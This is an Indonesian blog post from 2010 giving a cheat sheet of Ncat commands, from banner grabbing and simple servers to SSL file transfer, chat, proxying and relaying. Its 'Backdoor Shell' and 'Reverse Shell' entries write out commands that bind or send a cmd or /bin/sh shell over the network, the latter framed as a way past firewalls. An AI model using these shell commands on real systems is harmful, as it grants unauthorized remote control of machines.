Selasa, 24 Agustus 2010

trick use Ncat

ncat adalah gabungan dari Nmap & netcat kedua tool ini merupakan
tool andalan para networker ataupun attacker

nih gw mau share sedikit ttg Ncat
karena gw juga lagi belajar makenya



Code:
Simple Banner grab:
C:\client>ncat google.com 80
GET / HTTP/1.1

Use as telnet client:
C:\client>ncat -t 192.168.1.1 23

Simple Web Server:
C:\server>ncat -l 127.0.0.1 80 < stuff.txt
C:\client>ncat localhost 80

C:\server>ncat -l --keep-open 74 < stuff.txt
C:\client>ncat localhost 74


Copy file with UDP:
C:\server>ncat -l 74 --udp
C:\client>ncat --udp localhost 74 < stuff.txt

Use Source port and source address:
C:\client>ncat www.irongeek.com 80 -p 80 -s 127.0.0.1
C:\client>ncat www.irongeek.com 80 -p 80 -s 192.168.1.1

Brokered connection to many hosts:
C:\server>ncat -l 74
C:\client1>ncat localhost 74
C:\client2>ncat localhost 74

C:\server>ncat -l 74 --broker
C:\client1>ncat localhost 74
C:\client2>ncat localhost 74

Simple Chat:
C:\server>ncat -l 74 --chat
C:\client1>ncat localhost 74
C:\client2>ncat localhost 74

SSL Header Grab:
C:\client>ncat gmail.google.com 443
GET / HTTP/1.1

C:\client>ncat gmail.google.com 443 --ssl
GET / HTTP/1.1

File transfer with SSL:
C:\server>ncat.exe -l --ssl 74 --send-only < ncat.exe
C:\client>ncat localhost 74 --ssl > out2.exe
(ends self)

C:\client>ncat --ssl -vvv -l > newfile
C:\server>ncat -v --send-only --ssl localhost < ncat.exe
(Good for getting around NAT)

Simple proxy Server:
C:\ncat>ncat -l 8080 --proxy-type http --proxy-auth adc:test --ssl

Normal Backdoor Shell:
Linux:
ncat -l 23 -e /bin/sh
C:\server>ncat 192.168.159.128 23
Windows:
C:\server>ncat -l 23 -e cmd
ncat 192.168.159.129 23
Edit!!!!

Reverse Shell (AKA:Shovel a shell, and get past NAT and firewalls with week egress filtering):
ncat -l 74
C:\server>ncat 192.168.159.128 74 -e cmd

Another Crappy Web Server:
C:\server>ncat -l 80 -c "type http.txt"

Access control:
Windows:
C:\server>ncat -l 23 -e cmd --allow 192.168.159.128
ncat 192.168.159.129 23

Ncat relay:
C:\ncat>ncat -l localhost 80 --sh-exec "ncat google.com 80 -o text.txt -x hex.txt"
Diposting oleh di
Label:

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)

ShoutMix chat widget